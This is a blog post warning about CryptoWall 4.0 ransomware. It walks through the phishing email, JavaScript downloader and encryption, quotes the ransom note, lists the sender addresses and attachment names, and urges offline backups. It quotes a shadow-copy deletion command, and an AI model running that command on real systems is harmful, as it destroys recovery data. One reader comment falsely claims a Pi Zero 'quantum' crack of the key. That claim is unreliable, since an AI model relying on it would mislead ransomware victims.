Cryptolocker new and improved: Cryptowall 4.0

It’s been a long day.  You’re tired… heck you’re exasperated.  You prop your elbows on your desk and sink your chin into both palms.

What a pleasant respite from the day… today was nuts

Suddenly an email pops in your inbox from someone named Maryln.

Hmm… What’s this?

Your curiosity moves your mouse to open the message…

Who is this Maryln person?  Perhaps she’s the perfect hire for the position I posted earlier?

Did you even post a position earlier?  Who cares – it’s so easy to click.

So mindless.

So rewarding.

The mouse makes the unmistakable “click” noise and the document opens. But behind the scenes a malicious javascript file named resume.js begins downloading analitics.exe, saves it as 160967782.exe and does three things:

  1. Inject itself into explorer.exe and immediately disables system restore and startup repair
  2. Deletes all your Shadow Volume Copies with vssadmin.exe Delete Shadows /All /Quiet
  3. Encrypts your hard drive, attached removable hard drives, USB drives and mapped network drives and then swallows the key.  The only way to retrieve your files is to pay your attackers a whopping $700 dollars.  I hope you have backups..

Boom!  You just got punked!

This isn’t some story I made up – this is actually how CryptoWall 4 works.

It’s basically a revised version of CryptoLocker and it’s beginning to wreak havok on the net.  The worst part is not only does CryptoWall 4.0 scramble every chunk of writable media connected to your computer but it also scrambles the files names too!

So you won’t even know what’s been encrypted – you won’t know what you lost.

Take a look at what happened to my Windows 10 box:

CryptoWall 4.0 Filenames scrambled

After getting infected it changed the file names and extensions of my files so that they are almost completely unrecognizable.  The only substantive bit of information I’m left with is the file size.

Here’s how the CryptoWall 4.0 attack usually works:

An attack obtains your email address and sends you a gratuitious email with a malicious attachment.  The file is usually sent from one of the following people:

  • beigang45518zheng@163.com
  • mengxiong00539po@163.com
  • xlashan155lu@163.com

And can have any of these attachments:

  • Paulene_resume_9079.zip
  • Ardell_resume_6688.zip
  • Myriam_resume_8347.zip

CryptoWall 4.0 Phishing AttemptIf you click the attachment, extract it and open it you’ll invoke an obfuscated javascript file which instantly attempts to download the malware.

If you’re a real geek you can view the hybrid-analysis of the payload sample here


But now it’s too late.  In an instant, all connected storage media is irrevocably encrypted and you see a demeaning “tutorial” explaining that you’ve now become part of  “a large community CryptoWall”.

When my system was infected the entire process completed in less than 20 seconds.

CryptoWall 4.0 Banner

Gone in 20 seconds!

Here’s what you’ll find in the “setup guide”

In case if these simple rules are violated we will not able to help you, and we will not try because you have been warned.
For your attention the software to decrypt the files (as well as the private key that come fitted with it) is a paid product.
After purchasing the software package you can:
1. Decrypt all your files.
2. Work with your documents.
3. View your photos and other media content.
4. Continue your habitual and comfortable work at the computer.
If you are aware whole importance and criticality of the situation, then we suggest you go directly to your personal page where you will be given final instructions, as well as guarantees to restore your files.

Basically the bad guys illicitly encrypt all your files (and other peoples files if you have mapped drive locations) and then hold your files hostage until you pay the “CryptoWall Service” fee of $700 USD.

Some people call this malware, others refer to it as ransomware but I call it bullshit.

Who the flip do these guys think they are?  Do they realize how much money they are costing people?

Costing companies?

Do they not realize how much pain and misery they are inflicting upon innocent victims; most of who don’t have backups and can’t afford to decrypt their files?

I hate this because it takes zero skill to implement and it exploits the ignorance of perfectly innocent people.  On the one hand, yes – I get it – people shouldn’t open suspicious attachments but for every 98 users who follow the rules there are always 2 who will click anything that comes at them and they’ll get infected.  I get it.

These people brought this pain upon themselves but I hate the cowardice and brazen disrespect these cyber criminals are using to exploit their victims.  The “help files” are a complete effrontery to the victim.

Whatever…

CryptoWall tutorial

The real problem is that since your files are encrypted with 2,048 bit encryption it’s virtually impossible to brute force the keyspace and extrapolate the original plain-text copies of your data.  You’re forced to either pay the fine, restore a backup or weep for weeks.

The Bottom Line

Make backups.

That’s the bottom line.  But it’s bigger than that.  If your backups are being stored to an external hard drive that’s always connected to your computer then those files would have been encrypted too.  This also goes for any network storage drives you had on your home network.  You need to be making periodic backups that you keep in a vault, a locked safe or somewhere physical separate from your computer.

Think about the cost of your data.  How much is it worth to you?  How hard would it be to get everything back on your computer if you got CryptoWalled tonight?

Leave a comment and tell me what you think about all this.

About

Connect with Vonnie on Twitter

Posted in Mac OS X 10.9 Mavericks, Samsung Galaxy S4, Windows, Windows 10, Windows 7, Windows 8, Windows 8.1, Windows Vista, Windows XP Tagged with: , ,
  • Bok

    Have a client with a receptionist that has been burned by previous CryptoLocker versions TWICE! Fortunately, we had good backups and still do.

  • Peter Psaradellis

    Thanks for this excellent article describing the latest Cryptolocker techniques.

    I have had to personally deal with a few instances of Crypto infections at client sites, and the simplest method is to restore data from backups.
    In a few instances we also restored servers, network data, and OS drives just to be sure.

  • OMGWTFZPMBBQ

    This is old news: i wrote a piece of software that runs on a Pi Zero that can brute force the key using a variant of the number sieve running with a near quantum speedup using inter-row tunneling in the memory chip within a small temperature range.

    Can decode in about 4.5 hours but adding more CPUs drops this substantially.